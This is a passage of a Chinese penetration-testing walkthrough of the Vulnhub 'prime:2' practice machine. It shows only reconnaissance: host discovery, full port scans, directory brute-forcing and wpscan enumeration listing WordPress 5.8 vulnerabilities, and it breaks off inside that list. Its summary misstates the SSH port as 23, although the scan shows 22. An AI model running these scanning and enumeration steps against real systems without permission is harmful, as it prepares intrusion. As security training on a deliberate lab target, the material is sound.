vuInhub靶场实战系列--prime:2

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。


前言

今日测试内容渗透prime:2靶机:

Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍prime:2靶机渗透测试,该系统主要包含LFI和SMB漏洞,具体内容包括主机扫描(nmap\netdiscover\arp-scan)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch\gobuster)、wpscan扫描、netcat、反弹shell、容器相关内容、linux内核提权等内容。

Description
Back to the Top
This vm will give you some real concept that is needfull for a global level certifications. And you are going to enjoy this VM because of there is a good combination of network and web pentesting. For any help contact here https://www.hackerctf.com/contact-us or drop an email to suraj@hackerctf.com


一、环境配置

1.1 靶场信息

官方链接https://www.vulnhub.com/entry/prime-2021-2,696/
发布日期2021年5月9日
靶场大小761MB
作者Suraj
系列Prime (2021)
难度★★★☆☆

1.2 靶场配置


二、信息收集

2.1 主机发现

2.1.1 netdiscover

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -i eth0 -r 192.168.6.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                       
                                                                                                     
 17 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 1020                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.6.1     00:50:56:c0:00:08     14     840  VMware, Inc.                                      
 192.168.6.2     00:50:56:f5:7b:9f      1      60  VMware, Inc.                                      
 192.168.6.163   00:50:56:30:c4:b4      1      60  VMware, Inc.                                      
 192.168.6.254   00:50:56:e4:d2:90      1      60  VMware, Inc.                                                                                        

2.1.2 nmap主机扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 04:59 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00054s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.163
Host is up (0.0011s latency).
MAC Address: 00:50:56:30:C4:B4 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.00044s latency).
MAC Address: 00:50:56:E4:D2:90 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.05 seconds
                                                                    

2.1.3 arp-scan主机扫描

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1     00:50:56:c0:00:08       VMware, Inc.
192.168.6.2     00:50:56:f5:7b:9f       VMware, Inc.
192.168.6.163   00:50:56:30:c4:b4       VMware, Inc.
192.168.6.254   00:50:56:e4:d2:90       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.344 seconds (109.22 hosts/sec). 4 responded

综上所述的三种扫描方式,获得靶机信息
IP地址:192.168.6.163
MAC地址:00:50:56:30:c4:b4

2.2 端口扫描

2.2.1 masscan扫描

┌──(root㉿kali)-[/home/kali]
└─# masscan --rate=10000 --ports 0-65535 192.168.6.163
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-06-07 09:01:40 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 192.168.6.163                                   
Discovered open port 10123/tcp on 192.168.6.163                                
Discovered open port 445/tcp on 192.168.6.163        

2.2.2 nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p 1-65535 192.168.6.163      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 05:07 EDT
Nmap scan report for 192.168.6.163
Host is up (0.00070s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
|   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
|_http-title: HackerCTF
|_http-server-header: Apache/2.4.46 (Ubuntu)
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
|_http-title: Directory listing for /
MAC Address: 00:50:56:30:C4:B4 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.6.163

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.38 seconds

综上所述,获得靶机开放的端口信息:
23端口:ssh服务 (OpenSSH 8.4p1 Ubuntu 5ubuntu1)
80端口:http服务(Apache httpd 2.4.46 ((Ubuntu)))
139端口:netbios-ssn Samba服务(smbd 4.6.2)
445端口:netbios-ssn Samba服务(smbd 4.6.2)
10123端口:http服务(SimpleHTTPServer 0.6)

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.163
WhatWeb report for http://192.168.6.163
Status    : 200 OK
Title     : HackerCTF
IP        : 192.168.6.163
Country   : RESERVED, ZZ

Summary   : Apache[2.4.46], Bootstrap, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.4.46 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ Bootstrap ]
	Bootstrap is an open source toolkit for developing with 
	HTML, CSS, and JS. 

	Website     : https://getbootstrap.com/

[ HTML5 ]
	HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : Ubuntu Linux
	String       : Apache/2.4.46 (Ubuntu) (from server string)

[ X-UA-Compatible ]
	This plugin retrieves the X-UA-Compatible value from the 
	HTTP header and meta http-equiv tag. - More Info: 
	http://msdn.microsoft.com/en-us/library/cc817574.aspx 

	String       : IE=edge

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Fri, 07 Jun 2024 09:13:15 GMT
	Server: Apache/2.4.46 (Ubuntu)
	Last-Modified: Sat, 08 May 2021 05:59:51 GMT
	ETag: "1681-5c1cb40b7dd57-gzip"
	Accept-Ranges: bytes
	Vary: Accept-Encoding
	Content-Encoding: gzip
	Content-Length: 1701
	Connection: close
	Content-Type: text/html


获得一些关键信息;
Apache[2.4.46], Bootstrap, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], X-UA-Compatible[IE=edge]

2.4 目录扫描

2.4.1 dirb目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.163             

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jun  7 06:51:01 2024
URL_BASE: http://192.168.6.163/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.6.163/ ----
==> DIRECTORY: http://192.168.6.163/css/                                                             
==> DIRECTORY: http://192.168.6.163/images/                                                          
+ http://192.168.6.163/index.html (CODE:200|SIZE:5761)                                               
==> DIRECTORY: http://192.168.6.163/javascript/                                                      
==> DIRECTORY: http://192.168.6.163/server/                                                          
+ http://192.168.6.163/server-status (CODE:403|SIZE:278)                                             
==> DIRECTORY: http://192.168.6.163/wp/                                                              
                                                                                                     
---- Entering directory: http://192.168.6.163/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/javascript/ ----
==> DIRECTORY: http://192.168.6.163/javascript/jquery/                                               
                                                                                                     
---- Entering directory: http://192.168.6.163/server/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/ ----
+ http://192.168.6.163/wp/.git/HEAD (CODE:200|SIZE:23)                                               
+ http://192.168.6.163/wp/index.php (CODE:301|SIZE:0)                                                
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/                                                     
==> DIRECTORY: http://192.168.6.163/wp/wp-content/                                                   
==> DIRECTORY: http://192.168.6.163/wp/wp-includes/                                                  
+ http://192.168.6.163/wp/xmlrpc.php (CODE:405|SIZE:42)                                              
                                                                                                     
---- Entering directory: http://192.168.6.163/javascript/jquery/ ----
+ http://192.168.6.163/javascript/jquery/jquery (CODE:200|SIZE:287600)                               
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/ ----
+ http://192.168.6.163/wp/wp-admin/admin.php (CODE:302|SIZE:0)                                       
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/css/                                                 
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/images/                                              
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/includes/                                            
+ http://192.168.6.163/wp/wp-admin/index.php (CODE:302|SIZE:0)                                       
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/js/                                                  
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/maint/                                               
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/network/                                             
==> DIRECTORY: http://192.168.6.163/wp/wp-admin/user/                                                
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-content/ ----
+ http://192.168.6.163/wp/wp-content/index.php (CODE:200|SIZE:0)                                     
==> DIRECTORY: http://192.168.6.163/wp/wp-content/plugins/                                           
==> DIRECTORY: http://192.168.6.163/wp/wp-content/themes/                                            
==> DIRECTORY: http://192.168.6.163/wp/wp-content/upgrade/                                           
==> DIRECTORY: http://192.168.6.163/wp/wp-content/uploads/                                           
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/network/ ----
+ http://192.168.6.163/wp/wp-admin/network/admin.php (CODE:302|SIZE:0)                               
+ http://192.168.6.163/wp/wp-admin/network/index.php (CODE:302|SIZE:0)                               
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-admin/user/ ----
+ http://192.168.6.163/wp/wp-admin/user/admin.php (CODE:302|SIZE:0)                                  
+ http://192.168.6.163/wp/wp-admin/user/index.php (CODE:302|SIZE:0)                                  
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-content/plugins/ ----
+ http://192.168.6.163/wp/wp-content/plugins/index.php (CODE:200|SIZE:0)                             
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-content/themes/ ----
+ http://192.168.6.163/wp/wp-content/themes/index.php (CODE:200|SIZE:0)                              
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.6.163/wp/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Fri Jun  7 06:52:22 2024
DOWNLOADED: 46120 - FOUND: 15

发现15个目录

2.4.2 dirsearch目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.163 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.6.163/_24-06-07_06-54-28.txt

Target: http://192.168.6.163/

[06:54:28] Starting: 
[06:54:32] 403 -  278B  - /.htaccess.bak1                                   
[06:54:32] 403 -  278B  - /.ht_wsr.txt
[06:54:32] 403 -  278B  - /.htaccess.orig                                   
[06:54:32] 403 -  278B  - /.htaccess_extra                                  
[06:54:32] 403 -  278B  - /.htaccess_orig
[06:54:32] 403 -  278B  - /.htaccess.save
[06:54:32] 403 -  278B  - /.htm                                             
[06:54:32] 403 -  278B  - /.htaccessOLD2
[06:54:32] 403 -  278B  - /.htaccess_sc
[06:54:32] 403 -  278B  - /.htpasswd_test                                   
[06:54:32] 403 -  278B  - /.htpasswds
[06:54:32] 403 -  278B  - /.html                                            
[06:54:32] 403 -  278B  - /.htaccessBAK                                     
[06:54:32] 403 -  278B  - /.htaccess.sample                                 
[06:54:32] 403 -  278B  - /.httr-oauth                                      
[06:54:32] 403 -  278B  - /.htaccessOLD                                     
[06:54:35] 403 -  278B  - /.php                                             
[06:55:07] 301 -  312B  - /css  ->  http://192.168.6.163/css/               
[06:55:21] 301 -  315B  - /images  ->  http://192.168.6.163/images/         
[06:55:21] 200 -  499B  - /images/                                          
[06:55:25] 301 -  319B  - /javascript  ->  http://192.168.6.163/javascript/ 
[06:55:55] 301 -  315B  - /server  ->  http://192.168.6.163/server/         
[06:55:55] 403 -  278B  - /server-status/                                   
[06:55:55] 403 -  278B  - /server-status                                    
[06:56:20] 301 -  311B  - /wp  ->  http://192.168.6.163/wp/                 
[06:56:22] 200 -    3KB - /wp/                                              
[06:56:22] 200 -    2KB - /wp/wp-login.php                                  
                                                                             
Task Completed
                                      
                                                                             
Task Completed

2.4.3 gobuster目录扫描

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.6.163 -t 30
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.163
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.163/.html                (Status: 403) [Size: 278]
http://192.168.6.163/.php                 (Status: 403) [Size: 278]
http://192.168.6.163/images               (Status: 301) [Size: 315] [--> http://192.168.6.163/images/]
http://192.168.6.163/index.html           (Status: 200) [Size: 5761]
http://192.168.6.163/css                  (Status: 301) [Size: 312] [--> http://192.168.6.163/css/]
http://192.168.6.163/server               (Status: 301) [Size: 315] [--> http://192.168.6.163/server/]
http://192.168.6.163/javascript           (Status: 301) [Size: 319] [--> http://192.168.6.163/javascript/]
http://192.168.6.163/wp                   (Status: 301) [Size: 311] [--> http://192.168.6.163/wp/]
http://192.168.6.163/.html                (Status: 403) [Size: 278]
http://192.168.6.163/.php                 (Status: 403) [Size: 278]
http://192.168.6.163/server-status        (Status: 403) [Size: 278]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

测试结果显示,获得一些目录

目录URL目录
1http://192.168.6.163/wp/wp-login.php
2http://192.168.6.163/server/
3http://192.168.6.163/images/
4http://192.168.6.163/wp/wp-content/
5http://192.168.6.163/wp/wp-admin/includes/
6http://192.168.6.163/wp/wp-admin/js/
7http://192.168.6.163/wp/wp-admin/maint/
8http://192.168.6.163/wp/wp-admin/network/
9http://192.168.6.163/wp/wp-admin/user/
10http://192.168.6.163/wp/wp-content/index.php
11http://192.168.6.163/wp/wp-content/plugins/
12http://192.168.6.163/wp/wp-content/themes/
13http://192.168.6.163/wp/wp-content/upgrade/
14http://192.168.6.163/wp/wp-content/uploads/

2.5 漏洞切入点

2.5.1 wpscan普通扫描

使用wpscan扫描网站登录页

┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://192.168.6.163 -e                 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


Scan Aborted: The remote website is up, but does not seem to be running WordPress.
                                                                                                                                                                                  
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://192.168.6.163/wp/ -e
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.6.163/wp/ [192.168.6.163]
[+] Started: Fri Jun  7 07:25:47 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.6.163/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.6.163/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.6.163/wp/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.6.163/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.6.163/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.6.163/wp/, Match: 'WordPress 5.8'

[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.6.163/wp/wp-content/themes/twentytwentyone/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://192.168.6.163/wp/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://192.168.6.163/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.6.163/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:02 <==================================================================================================> (652 / 652) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:10 <================================================================================================> (2575 / 2575) 100.00% Time: 00:00:10

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <=========================================================================================================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <==============================================================================================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jun  7 07:26:16 2024
[+] Requests Done: 3598
[+] Cached Requests: 9
[+] Data Sent: 1023.453 KB
[+] Data Received: 1017.489 KB
[+] Memory used: 303.73 MB
[+] Elapsed time: 00:00:29

没有发现有用的东西,提示使用免费的API token…

2.5.2 wpscan高级扫描

┌──(root㉿kali)-[/home/kali]
└─# wpscan --api-token apitoken --url http://192.168.6.163/wp -e
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.6.163/wp/ [192.168.6.163]
[+] Started: Fri Jun  7 07:43:35 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.6.163/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.6.163/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.6.163/wp/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.6.163/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.6.163/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.6.163/wp/, Match: 'WordPress 5.8'
 |
 | [!] 38 vulnerabilities identified:
 |
 | [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
 |     Fixed in: 5.8.1
 |     References:
 |      - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5
 |
 | [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
 |     Fixed in: 5.8.1
 |     References:
 |      - https://wpscan.com/vulnerability/5b754676-20f5-4478-8fd3-6bc383145811
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39201
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-wh69-25hr-h94v
 |
 | [!] Title: WordPress 5.4 to 5.8 -  Lodash Library Update
 |     Fixed in: 5.8.1
 |     References:
 |      - https://wpscan.com/vulnerability/5d6789db-e320-494b-81bb-e678674f4199
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/lodash/lodash/wiki/Changelog
 |      - https://github.com/WordPress/wordpress-develop/commit/fb7ecd92acef6c813c1fde6d9d24a21e02340689
 |
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.8.2
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207
 |
 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.8.3
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
 |
 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
 |     Fixed in: 5.8.3
 |     References:
 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
 |      - https://hackerone.com/reports/425342
 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
 |
 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
 |     Fixed in: 5.8.3
 |     References:
 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
 |
 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
 |     Fixed in: 5.8.3
 |     References:
 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
